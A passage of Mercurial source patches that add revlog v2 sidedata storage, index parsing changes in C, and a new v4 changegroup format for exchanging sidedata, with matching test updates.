PyObject *args, PyObject *kwargs) { - PyObject *data_obj, *inlined_obj; + PyObject *data_obj, *inlined_obj, *revlogv2; Py_ssize_t size; + static char *kwlist[] = {"data", "inlined", "revlogv2", NULL}; + /* Initialize before argument-checking to avoid index_dealloc() crash. */ self->added = NULL; @@ -2606,7 +2649,9 @@ self->nodelen = 20; self->nullentry = NULL; - if (!PyArg_ParseTuple(args, "OO", &data_obj, &inlined_obj)) + revlogv2 = NULL; + if (!PyArg_ParseTupleAndKeywords(args, kwargs, "OO|O", kwlist, + &data_obj, &inlined_obj, &revlogv2)) return -1; if (!PyObject_CheckBuffer(data_obj)) { PyErr_SetString(PyExc_TypeError, @@ -2618,8 +2663,22 @@ return -1; } - self->nullentry = Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, - -1, -1, -1, -1, nullid, self->nodelen); + if (revlogv2 && PyObject_IsTrue(revlogv2)) { + self->hdrsize = v2_hdrsize; + } else { + self->hdrsize = v1_hdrsize; + } + + if (self->hdrsize == v1_hdrsize) { + self->nullentry = + Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, -1, + -1, -1, -1, nullid, self->nodelen); + } else { + self->nullentry = Py_BuildValue( + PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0, -1, -1, -1, + -1, nullid, self->nodelen, 0, 0); + } + if (!self->nullentry) return -1; PyObject_GC_UnTrack(self->nullentry); @@ -2641,11 +2700,11 @@ goto bail; self->length = len; } else { - if (size % v1_hdrsize) { + if (size % self->hdrsize) { PyErr_SetString(PyExc_ValueError, "corrupt index file"); goto bail; } - self->length = size / v1_hdrsize; + self->length = size / self->hdrsize; } return 0; @@ -2797,16 +2856,16 @@ }; /* - * returns a tuple of the form (index, index, cache) with elements as + * returns a tuple of the form (index, cache) with elements as * follows: * - * index: an index object that lazily parses RevlogNG records + * index: an index object that lazily parses Revlog (v1 or v2) records * cache: if data is inlined, a tuple (0, index_file_content), else None * index_file_content could be a string, or a buffer * * added complications are for backwards compatibility */ -PyObject *parse_index2(PyObject *self, PyObject *args) +PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs) { PyObject *cache = NULL; indexObject *idx; @@ -2816,7 +2875,7 @@ if (idx == NULL) goto bail; - ret = index_init(idx, args); + ret = index_init(idx, args, kwargs); if (ret == -1) goto bail; # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1610966691 -3600 # Mon Jan 18 11:44:51 2021 +0100 # Node ID 3d740058b46787c133fd43b3f6252bfa2bae47d6 # Parent 358737abeeefc68da1bbceba5f4fb27eaa5149aa sidedata: move to new sidedata storage in revlogv2 The current (experimental) sidedata system uses flagprocessors to signify the presence and store/retrieve sidedata from the raw revlog data. This proved to be quite fragile from an exchange perspective and a lot more complex than simply having a dedicated space in the new revlog format. This change does not handle exchange (ironically), so the test for amend - that uses a bundle - is broken. This functionality is split into the next patches. Differential Revision: https://phab.mercurial-scm.org/D9993 diff --git a/hgext/lfs/wrapper.py b/hgext/lfs/wrapper.py --- a/hgext/lfs/wrapper.py +++ b/hgext/lfs/wrapper.py @@ -116,10 +116,10 @@ if hgmeta or text.startswith(b'\1\n'): text = storageutil.packmeta(hgmeta, text) - return (text, True, {}) + return (text, True) -def writetostore(self, text, sidedata): +def writetostore(self, text): # hg filelog metadata (includes rename, etc) hgmeta, offset = storageutil.parsemeta(text) if offset and offset > 0: diff --git a/hgext/remotefilelog/remotefilelog.py b/hgext/remotefilelog/remotefilelog.py --- a/hgext/remotefilelog/remotefilelog.py +++ b/hgext/remotefilelog/remotefilelog.py @@ -155,12 +155,12 @@ # text passed to "addrevision" includes hg filelog metadata header if node is None: node = storageutil.hashrevisionsha1(text, p1, p2) - if sidedata is None: - sidedata = {} meta, metaoffset = storageutil.parsemeta(text) rawtext, validatehash = flagutil.processflagswrite( - self, text, flags, sidedata=sidedata + self, + text, + flags, ) return self.addrawrevision( rawtext, diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -120,10 +120,10 @@ # Flag processors for REVIDX_ELLIPSIS. def ellipsisreadprocessor(rl, text): - return text, False, {} - - -def ellipsiswriteprocessor(rl, text, sidedata): + return text, False + + +def ellipsiswriteprocessor(rl, text): return text, False @@ -554,8 +554,6 @@ if self._mmaplargeindex and b'mmapindexthreshold' in opts: mmapindexthreshold = opts[b'mmapindexthreshold'] self.hassidedata = bool(opts.get(b'side-data', False)) - if self.hassidedata: - self._flagprocessors[REVIDX_SIDEDATA] = sidedatautil.processors self._sparserevlog = bool(opts.get(b'sparse-revlog', False)) withsparseread = bool(opts.get(b'with-sparse-read', False)) # sparse-revlog forces sparse-read @@ -856,6 +854,11 @@ def length(self, rev): return self.index[rev][1] + def sidedata_length(self, rev): + if self.version & 0xFFFF != REVLOGV2: + return 0 + return self.index[rev][9] + def rawsize(self, rev): """return the length of the uncompressed text for a given revision""" l = self.index[rev][2] @@ -917,7 +920,7 @@ # Derived from index values. def end(self, rev): - return self.start(rev) + self.length(rev) + return self.start(rev) + self.length(rev) + self.sidedata_length(rev) def parents(self, node): i = self.index @@ -1853,7 +1856,7 @@ elif operation == b'read': return flagutil.processflagsread(self, text, flags) else: # write operation - return flagutil.processflagswrite(self, text, flags, None) + return flagutil.processflagswrite(self, text, flags) def revision(self, nodeorrev, _df=None, raw=False): """return an uncompressed revision of a given node or revision @@ -1898,10 +1901,17 @@ # revision or might need to be processed to retrieve the revision. rev, rawtext, validated = self._rawtext(node, rev, _df=_df) + if self.version & 0xFFFF == REVLOGV2: + if rev is None: + rev = self.rev(node) + sidedata = self._sidedata(rev) + else: + sidedata = {} + if raw and validated: # if we don't want to process the raw text and that raw # text is cached, we can exit early. - return rawtext, {} + return rawtext, sidedata if rev is None: rev = self.rev(node) # the revlog's flag for this revision @@ -1910,20 +1920,14 @@ if validated and flags == REVIDX_DEFAULT_FLAGS: # no extra flags set, no flag processor runs, text = rawtext - return rawtext, {} - - sidedata = {} + return rawtext, sidedata + if raw: validatehash = flagutil.processflagsraw(self, rawtext, flags) text = rawtext else: - try: - r = flagutil.processflagsread(self, rawtext, flags) - except error.SidedataHashError as exc: - msg = _(b"integrity check failed on %s:%s sidedata key %d") - msg %= (self.indexfile, pycompat.bytestr(rev), exc.sidedatakey) - raise error.RevlogError(msg) - text, validatehash, sidedata = r + r = flagutil.processflagsread(self, rawtext, flags) + text, validatehash = r if validatehash: self.checkhash(text, node, rev=rev) if not validated: @@ -1974,6 +1978,21 @@ del basetext # let us have a chance to free memory early return (rev, rawtext, False) + def _sidedata(self, rev): + """Return the sidedata for a given revision number.""" + index_entry = self.index[rev] + sidedata_offset = index_entry[8] + sidedata_size = index_entry[9] + + if self._inline: + sidedata_offset += self._io.size * (1 + rev) + if sidedata_size == 0: + return {} + + segment = self._getsegment(sidedata_offset, sidedata_size) + sidedata = sidedatautil.deserialize_sidedata(segment) + return sidedata + def rawdata(self, nodeorrev, _df=None): """return an uncompressed raw data of a given node or revision number. @@ -2107,20 +2126,15 @@ if sidedata is None: sidedata = {} - flags = flags & ~REVIDX_SIDEDATA elif not self.hassidedata: raise error.ProgrammingError( _(b"trying to add sidedata to a revlog who don't support them") ) - else: - flags |= REVIDX_SIDEDATA if flags: node = node or self.hash(text, p1, p2) - rawtext, validatehash = flagutil.processflagswrite( - self, text, flags, sidedata=sidedata - ) + rawtext, validatehash = flagutil.processflagswrite(self, text, flags) # If the flag processor modifies the revision data, ignore any provided # cachedelta. @@ -2153,6 +2167,7 @@ flags, cachedelta=cachedelta, deltacomputer=deltacomputer, + sidedata=sidedata, ) def addrawrevision( @@ -2166,6 +2181,7 @@ flags, cachedelta=None, deltacomputer=None, + sidedata=None, ): """add a raw revision with known flags, node and parents useful when reusing a revision not stored in this revlog (ex: received @@ -2188,6 +2204,7 @@ ifh, dfh, deltacomputer=deltacomputer, + sidedata=sidedata, ) finally: if dfh: @@ -2281,6 +2298,7 @@ dfh, alwayscache=False, deltacomputer=None, + sidedata=None, ): """internal function to add revisions to the log @@ -2350,6 +2368,16 @@ deltainfo = deltacomputer.finddeltainfo(revinfo, fh) + if sidedata: + serialized_sidedata = sidedatautil.serialize_sidedata(sidedata) + sidedata_offset = offset + deltainfo.deltalen + else: + serialized_sidedata = b"" + # Don't store the offset if the sidedata is empty, that way + # we can easily detect empty sidedata and they will be no different + # than ones we manually add. + sidedata_offset = 0 + e = ( offset_type(offset, flags), deltainfo.deltalen, @@ -2359,18 +2387,24 @@ p1r, p2r, node, - 0, - 0, + sidedata_offset, + len(serialized_sidedata), ) if self.version & 0xFFFF != REVLOGV2: e = e[:8] self.index.append(e) - entry = self._io.packentry(e, self.node, self.version, curr) self._writeentry( - transaction, ifh, dfh, entry, deltainfo.data, link, offset + transaction, + ifh, + dfh, + entry, + deltainfo.data, + link, + offset, + serialized_sidedata, ) rawtext = btext[0] @@ -2383,7 +2417,9 @@ self._chainbasecache[curr] = deltainfo.chainbase return curr - def _writeentry(self, transaction, ifh, dfh, entry, data, link, offset): + def _writeentry( + self, transaction, ifh, dfh, entry, data, link, offset, sidedata + ): # Files opened in a+ mode have inconsistent behavior on various # platforms. Windows requires that a file positioning call be made # when the file handle transitions between reads and writes. See @@ -2407,6 +2443,8 @@ if data[0]: dfh.write(data[0]) dfh.write(data[1]) + if sidedata: + dfh.write(sidedata) ifh.write(entry) else: offset += curr * self._io.size @@ -2414,6 +2452,8 @@ ifh.write(entry) ifh.write(data[0]) ifh.write(data[1]) + if sidedata: + ifh.write(sidedata) self._enforceinlinesize(transaction, ifh) nodemaputil.setup_persistent_nodemap(transaction, self) diff --git a/mercurial/revlogutils/flagutil.py b/mercurial/revlogutils/flagutil.py --- a/mercurial/revlogutils/flagutil.py +++ b/mercurial/revlogutils/flagutil.py @@ -84,7 +84,7 @@ flagprocessors[flag] = processor -def processflagswrite(revlog, text, flags, sidedata): +def processflagswrite(revlog, text, flags): """Inspect revision data flags and applies write transformations defined by registered flag processors. @@ -100,9 +100,12 @@ processed text and ``validatehash`` is a bool indicating whether the returned text should be checked for hash integrity. """ - return _processflagsfunc(revlog, text, flags, b'write', sidedata=sidedata)[ - :2 - ] + return _processflagsfunc( + revlog, + text, + flags, + b'write', + )[:2] def processflagsread(revlog, text, flags): @@ -145,14 +148,14 @@ return _processflagsfunc(revlog, text, flags, b'raw')[1] -def _processflagsfunc(revlog, text, flags, operation, sidedata=None): +def _processflagsfunc(revlog, text, flags, operation): """internal function to process flag on a revlog This function is private to this module, code should never needs to call it directly.""" # fast path: no flag processors will run if flags == 0: - return text, True, {} + return text, True if operation not in (b'read', b'write', b'raw'): raise error.ProgrammingError(_(b"invalid '%s' operation") % operation) # Check all flags are known. @@ -168,7 +171,6 @@ if operation == b'write': orderedflags = reversed(orderedflags) - outsidedata = {} for flag in orderedflags: # If a flagprocessor has been registered for a known flag, apply the # related operation transform and update result tuple. @@ -186,10 +188,9 @@ if operation == b'raw': vhash = rawtransform(revlog, text) elif operation == b'read': - text, vhash, s = readtransform(revlog, text) - outsidedata.update(s) + text, vhash = readtransform(revlog, text) else: # write operation - text, vhash = writetransform(revlog, text, sidedata) + text, vhash = writetransform(revlog, text) validatehash = validatehash and vhash - return text, validatehash, outsidedata + return text, validatehash diff --git a/mercurial/revlogutils/sidedata.py b/mercurial/revlogutils/sidedata.py --- a/mercurial/revlogutils/sidedata.py +++ b/mercurial/revlogutils/sidedata.py @@ -13,9 +13,8 @@ The current implementation is experimental and subject to changes. Do not rely on it in production. -Sidedata are stored in the revlog itself, within the revision rawtext. They -are inserted and removed from it using the flagprocessors mechanism. The following -format is currently used:: +Sidedata are stored in the revlog itself, thanks to a new version of the +revlog. The following format is currently used:: initial header: <number of sidedata; 2 bytes> @@ -60,48 +59,35 @@ SIDEDATA_ENTRY = struct.Struct('>HL20s') -def sidedatawriteprocessor(rl, text, sidedata): +def serialize_sidedata(sidedata): sidedata = list(sidedata.items()) sidedata.sort() - rawtext = [SIDEDATA_HEADER.pack(len(sidedata))] + buf = [SIDEDATA_HEADER.pack(len(sidedata))] for key, value in sidedata: digest = hashutil.sha1(value).digest() - rawtext.append(SIDEDATA_ENTRY.pack(key, len(value), digest)) + buf.append(SIDEDATA_ENTRY.pack(key, len(value), digest)) for key, value in sidedata: - rawtext.append(value) - rawtext.append(bytes(text)) - return b''.join(rawtext), False + buf.append(value) + buf = b''.join(buf) + return buf -def sidedatareadprocessor(rl, text): +def deserialize_sidedata(blob): sidedata = {} offset = 0 - (nbentry,) = SIDEDATA_HEADER.unpack(text[: SIDEDATA_HEADER.size]) + (nbentry,) = SIDEDATA_HEADER.unpack(blob[: SIDEDATA_HEADER.size]) offset += SIDEDATA_HEADER.size dataoffset = SIDEDATA_HEADER.size + (SIDEDATA_ENTRY.size * nbentry) for i in range(nbentry): nextoffset = offset + SIDEDATA_ENTRY.size - key, size, storeddigest = SIDEDATA_ENTRY.unpack(text[offset:nextoffset]) + key, size, storeddigest = SIDEDATA_ENTRY.unpack(blob[offset:nextoffset]) offset = nextoffset # read the data associated with that entry nextdataoffset = dataoffset + size - entrytext = text[dataoffset:nextdataoffset] + entrytext = bytes(blob[dataoffset:nextdataoffset]) readdigest = hashutil.sha1(entrytext).digest() if storeddigest != readdigest: raise error.SidedataHashError(key, storeddigest, readdigest) sidedata[key] = entrytext dataoffset = nextdataoffset - text = text[dataoffset:] - return text, True, sidedata - - -def sidedatarawprocessor(rl, text): - # side data modifies rawtext and prevent rawtext hash validation - return False - - -processors = ( - sidedatareadprocessor, - sidedatawriteprocessor, - sidedatarawprocessor, -) + return sidedata diff --git a/tests/flagprocessorext.py b/tests/flagprocessorext.py --- a/tests/flagprocessorext.py +++ b/tests/flagprocessorext.py @@ -31,28 +31,28 @@ return False -def noopdonothing(self, text, sidedata): +def noopdonothing(self, text): return (text, True) def noopdonothingread(self, text): - return (text, True, {}) + return (text, True) -def b64encode(self, text, sidedata): +def b64encode(self, text): return (base64.b64encode(text), False) def b64decode(self, text): - return (base64.b64decode(text), True, {}) + return (base64.b64decode(text), True) -def gzipcompress(self, text, sidedata): +def gzipcompress(self, text): return (zlib.compress(text), False) def gzipdecompress(self, text): - return (zlib.decompress(text), True, {}) + return (zlib.decompress(text), True) def supportedoutgoingversions(orig, repo): diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -300,7 +300,7 @@ text = rawtext else: r = flagutil.processflagsread(self, rawtext, flags) - text, validatehash, sidedata = r + text, validatehash = r if validatehash: self.checkhash(text, node, rev=rev) diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -271,12 +271,13 @@ $ hg ci --amend -m 'copy a to j, v2' saved backup bundle to $TESTTMP/repo/.hg/strip-backup/*-*-amend.hg (glob) $ hg debugsidedata -c -v -- -1 - 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x00\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00aj' + 1 sidedata entries (missing-correct-output !) + entry-0014 size 24 (missing-correct-output !) + '\x00\x00\x00\x02\x00\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00aj' (missing-correct-output !) #endif $ hg showcopies --config experimental.copies.read-from=filelog-only - a -> j + a -> j (sidedata missing-correct-output !) + a -> j (no-sidedata !) The entries should be written to extras even if they're empty (so the client won't have to fall back to reading from filelogs) $ echo x >> j @@ -354,7 +355,8 @@ saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob) $ hg st --change . --copies A b - a + a (sidedata missing-correct-output !) + a (no-sidedata !) R a $ cd .. diff --git a/tests/test-revlog-raw.py b/tests/test-revlog-raw.py --- a/tests/test-revlog-raw.py +++ b/tests/test-revlog-raw.py @@ -51,10 +51,10 @@ def readprocessor(self, rawtext): # True: the returned text could be used to verify hash text = rawtext[len(_extheader) :].replace(b'i', b'1') - return text, True, {} + return text, True -def writeprocessor(self, text, sidedata): +def writeprocessor(self, text): # False: the returned rawtext shouldn't be used to verify hash rawtext = _extheader + text.replace(b'1', b'i') return rawtext, False @@ -293,7 +293,7 @@ # Verify text, rawtext, and rawsize if isext: - rawtext = writeprocessor(None, text, {})[0] + rawtext = writeprocessor(None, text)[0] else: rawtext = text if rlog.rawsize(rev) != len(rawtext): diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata.py @@ -40,19 +40,20 @@ return orig(self, text, transaction, link, p1, p2, *args, **kwargs) -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) +def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): + text, sd = orig(self, nodeorrev, *args, **kwargs) if getattr(self, 'sidedatanocheck', False): - return text + return text, sd + if self.version & 0xFFFF != 2: + return text, sd if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: raise RuntimeError('text size mismatch') expected = sd[sidedata.SD_TEST2] got = hashlib.sha256(text).digest() if got != expected: raise RuntimeError('sha256 mismatch') - return text + return text, sd def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): @@ -81,7 +82,7 @@ def extsetup(ui): extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) + extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) extensions.wrapfunction( upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion ) # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613729230 -3600 # Fri Feb 19 11:07:10 2021 +0100 # Node ID 4cd214c9948d40d006fc09df0c20f090f387d426 # Parent 3d740058b46787c133fd43b3f6252bfa2bae47d6 revlogv2: don't assume that the sidedata of the last rev is right after data We are going to be rewriting sidedata soon, it's going to be appended to the revlog data file, meaning that the data and the sidedata might not be contiguous. Differential Revision: https://phab.mercurial-scm.org/D10025 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -920,7 +920,7 @@ # Derived from index values. def end(self, rev): - return self.start(rev) + self.length(rev) + self.sidedata_length(rev) + return self.start(rev) + self.length(rev) def parents(self, node): i = self.index @@ -2331,7 +2331,8 @@ curr = len(self) prev = curr - 1 - offset = self.end(prev) + + offset = self._get_data_offset(prev) if self._concurrencychecker: if self._inline: @@ -2417,6 +2418,26 @@ self._chainbasecache[curr] = deltainfo.chainbase return curr + def _get_data_offset(self, prev): + """Returns the current offset in the (in-transaction) data file. + Versions < 2 of the revlog can get this 0(1), revlog v2 needs a docket + file to store that information: since sidedata can be rewritten to the + end of the data file within a transaction, you can have cases where, for + example, rev `n` does not have sidedata while rev `n - 1` does, leading + to `n - 1`'s sidedata being written after `n`'s data. + + TODO cache this in a docket file before getting out of experimental.""" + if self.version & 0xFFFF != REVLOGV2: + return self.end(prev) + + offset = 0 + for rev, entry in enumerate(self.index): + sidedata_end = entry[8] + entry[9] + # Sidedata for a previous rev has potentially been written after + # this rev's end, so take the max. + offset = max(self.end(rev), offset, sidedata_end) + return offset + def _writeentry( self, transaction, ifh, dfh, entry, data, link, offset, sidedata ): # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613666212 -3600 # Thu Feb 18 17:36:52 2021 +0100 # Node ID a41565bef69f7e0224a15dff8f381f1a77d0da66 # Parent 4cd214c9948d40d006fc09df0c20f090f387d426 changegroup: add v4 changegroup for revlog v2 exchange This change only adds the required infrastructure for the new changegroup format and does not do any actual exchange. This will be done in the next patches. Differential Revision: https://phab.mercurial-scm.org/D10026 diff --git a/hgext/remotefilelog/remotefilelog.py b/hgext/remotefilelog/remotefilelog.py --- a/hgext/remotefilelog/remotefilelog.py +++ b/hgext/remotefilelog/remotefilelog.py @@ -306,6 +306,7 @@ assumehaveparentrevisions=False, deltaprevious=False, deltamode=None, + sidedata_helpers=None, ): # we don't use any of these parameters here del nodesorder, revisiondata, assumehaveparentrevisions, deltaprevious @@ -333,6 +334,8 @@ baserevisionsize=None, revision=revision, delta=delta, + # Sidedata is not supported yet + sidedata=None, ) def revdiff(self, node1, node2): diff --git a/hgext/remotefilelog/shallowbundle.py b/hgext/remotefilelog/shallowbundle.py --- a/hgext/remotefilelog/shallowbundle.py +++ b/hgext/remotefilelog/shallowbundle.py @@ -67,7 +67,7 @@ shallowcg1packer, self, nodelist, rlog, lookup, units=units ) - def generatefiles(self, changedfiles, *args): + def generatefiles(self, changedfiles, *args, **kwargs): try: linknodes, commonrevs, source = args except ValueError: @@ -92,7 +92,9 @@ [f for f in changedfiles if not repo.shallowmatch(f)] ) - return super(shallowcg1packer, self).generatefiles(changedfiles, *args) + return super(shallowcg1packer, self).generatefiles( + changedfiles, *args, **kwargs + ) def shouldaddfilegroups(self, source): repo = self._repo @@ -176,9 +178,11 @@ repo.shallowmatch = original -def addchangegroupfiles(orig, repo, source, revmap, trp, expectedfiles, *args): +def addchangegroupfiles( + orig, repo, source, revmap, trp, expectedfiles, *args, **kwargs +): if not shallowutil.isenabled(repo): - return orig(repo, source, revmap, trp, expectedfiles, *args) + return orig(repo, source, revmap, trp, expectedfiles, *args, **kwargs) newfiles = 0 visited = set() @@ -272,7 +276,7 @@ revisiondata = revisiondatas[(f, node)] # revisiondata: (node, p1, p2, cs, deltabase, delta, flags) - node, p1, p2, linknode, deltabase, delta, flags = revisiondata + node, p1, p2, linknode, deltabase, delta, flags, sidedata = revisiondata if not available(f, node, f, deltabase): continue diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -681,7 +681,16 @@ ): empty = True - for node, p1, p2, linknode, deltabase, delta, wireflags in deltas: + for ( + node, + p1, + p2, + linknode, + deltabase, + delta, + wireflags, + sidedata, + ) in deltas: storeflags = 0 if wireflags & repository.REVISION_FLAG_CENSORED: diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -61,7 +61,7 @@ self.repotiprev = n - 1 self.bundlerevs = set() # used by 'bundle()' revset expression for deltadata in cgunpacker.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata size = len(delta) start = cgunpacker.tell() - size diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -32,6 +32,7 @@ ) from .interfaces import repository +from .revlogutils import sidedata as sidedatamod _CHANGEGROUPV1_DELTA_HEADER = struct.Struct(b"20s20s20s20s") _CHANGEGROUPV2_DELTA_HEADER = struct.Struct(b"20s20s20s20s20s") @@ -202,7 +203,9 @@ header = self.deltaheader.unpack(headerdata) delta = readexactly(self._stream, l - self.deltaheadersize) node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode) - return (node, p1, p2, cs, deltabase, delta, flags) + # cg4 forward-compat + sidedata = {} + return (node, p1, p2, cs, deltabase, delta, flags, sidedata) def getchunks(self): """returns all the chunks contains in the bundle @@ -552,6 +555,29 @@ raise error.Abort(_(b"received dir revlog group is empty")) +class cg4unpacker(cg3unpacker): + """Unpacker for cg4 streams. + + cg4 streams add support for exchanging sidedata. + """ + + version = b'04' + + def deltachunk(self, prevnode): + res = super(cg4unpacker, self).deltachunk(prevnode) + if not res: + return res + + (node, p1, p2, cs, deltabase, delta, flags, _sidedata) = res + + sidedata_raw = getchunk(self._stream) + sidedata = {} + if len(sidedata_raw) > 0: + sidedata = sidedatamod.deserialize_sidedata(sidedata_raw) + + return node, p1, p2, cs, deltabase, delta, flags, sidedata + + class headerlessfixup(object): def __init__(self, fh, h): self._h = h @@ -861,6 +887,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): """Given a source repo, construct a bundler. @@ -893,6 +920,8 @@ nodes. We store this rather than the set of nodes that should be ellipsis because for very large histories we expect this to be significantly smaller. + + remote_sidedata is the set of sidedata categories wanted by the remote. """ assert oldmatcher assert matcher @@ -988,7 +1017,7 @@ for tree, deltas in it: if tree: - assert self.version == b'03' + assert self.version in (b'03', b'04') chunk = _fileheader(tree) size += len(chunk) yield chunk @@ -1394,6 +1423,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV1_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.linknode @@ -1424,6 +1454,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV2_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.basenode, d.linknode @@ -1453,6 +1484,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags @@ -1473,12 +1505,47 @@ ) +def _makecg4packer( + repo, + oldmatcher, + matcher, + bundlecaps, + ellipses=False, + shallow=False, + ellipsisroots=None, + fullnodes=None, + remote_sidedata=None, +): + # Same header func as cg3. Sidedata is in a separate chunk from the delta to + # differenciate "raw delta" and sidedata. + builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack( + d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags + ) + + return cgpacker( + repo, + oldmatcher, + matcher, + b'04', + builddeltaheader=builddeltaheader, + manifestsend=closechunk(), + bundlecaps=bundlecaps, + ellipses=ellipses, + shallow=shallow, + ellipsisroots=ellipsisroots, + fullnodes=fullnodes, + remote_sidedata=remote_sidedata, + ) + + _packermap = { b'01': (_makecg1packer, cg1unpacker), # cg2 adds support for exchanging generaldelta b'02': (_makecg2packer, cg2unpacker), # cg3 adds support for exchanging revlog flags and treemanifests b'03': (_makecg3packer, cg3unpacker), + # ch4 adds support for exchanging sidedata + b'04': (_makecg4packer, cg4unpacker), } @@ -1498,11 +1565,9 @@ # # (or even to push subset of history) needv03 = True - if b'exp-sidedata-flag' in repo.requirements: - needv03 = True - # don't attempt to use 01/02 until we do sidedata cleaning - versions.discard(b'01') - versions.discard(b'02') + has_revlogv2 = requirements.REVLOGV2_REQUIREMENT in repo.requirements + if not has_revlogv2: + versions.discard(b'04') if not needv03: versions.discard(b'03') return versions @@ -1565,6 +1630,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): assert version in supportedoutgoingversions(repo) @@ -1601,6 +1667,7 @@ shallow=shallow, ellipsisroots=ellipsisroots, fullnodes=fullnodes, + remote_sidedata=remote_sidedata, ) @@ -1644,8 +1711,15 @@ fastpath=False, bundlecaps=None, matcher=None, + remote_sidedata=None, ): - bundler = getbundler(version, repo, bundlecaps=bundlecaps, matcher=matcher) + bundler = getbundler( + version, + repo, + bundlecaps=bundlecaps, + matcher=matcher, + remote_sidedata=remote_sidedata, + ) repo = repo.unfiltered() commonrevs = outgoing.common diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -346,7 +346,7 @@ def showchunks(named): ui.write(b"\n%s%s\n" % (indent_string, named)) for deltadata in gen.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata ui.write( b"%s%s %s %s %s %s %d\n" % ( @@ -372,7 +372,7 @@ raise error.Abort(_(b'use debugbundle2 for this file')) gen.changelogheader() for deltadata in gen.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata ui.write(b"%s%s\n" % (indent_string, hex(node))) diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -2249,7 +2249,13 @@ def getbundlechunks( - repo, source, heads=None, common=None, bundlecaps=None, **kwargs + repo, + source, + heads=None, + common=None, + bundlecaps=None, + remote_sidedata=None, + **kwargs ): """Return chunks constituting a bundle's raw data. @@ -2279,7 +2285,12 @@ return ( info, changegroup.makestream( - repo, outgoing, b'01', source, bundlecaps=bundlecaps + repo, + outgoing, + b'01', + source, + bundlecaps=bundlecaps, + remote_sidedata=remote_sidedata, ), ) @@ -2303,6 +2314,7 @@ source, bundlecaps=bundlecaps, b2caps=b2caps, + remote_sidedata=remote_sidedata, **pycompat.strkwargs(kwargs) ) @@ -2325,6 +2337,7 @@ b2caps=None, heads=None, common=None, + remote_sidedata=None, **kwargs ): """add a changegroup part to the requested bundle""" @@ -2355,7 +2368,13 @@ matcher = None cgstream = changegroup.makestream( - repo, outgoing, version, source, bundlecaps=bundlecaps, matcher=matcher + repo, + outgoing, + version, + source, + bundlecaps=bundlecaps, + matcher=matcher, + remote_sidedata=remote_sidedata, ) part = bundler.newpart(b'changegroup', data=cgstream) diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -417,6 +417,8 @@ mdiff.trivialdiffheader(len(data)) + data, # Flags not yet supported. 0, + # Sidedata not yet supported + {}, ) cl.addgroup( @@ -496,6 +498,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() @@ -621,6 +625,8 @@ delta, 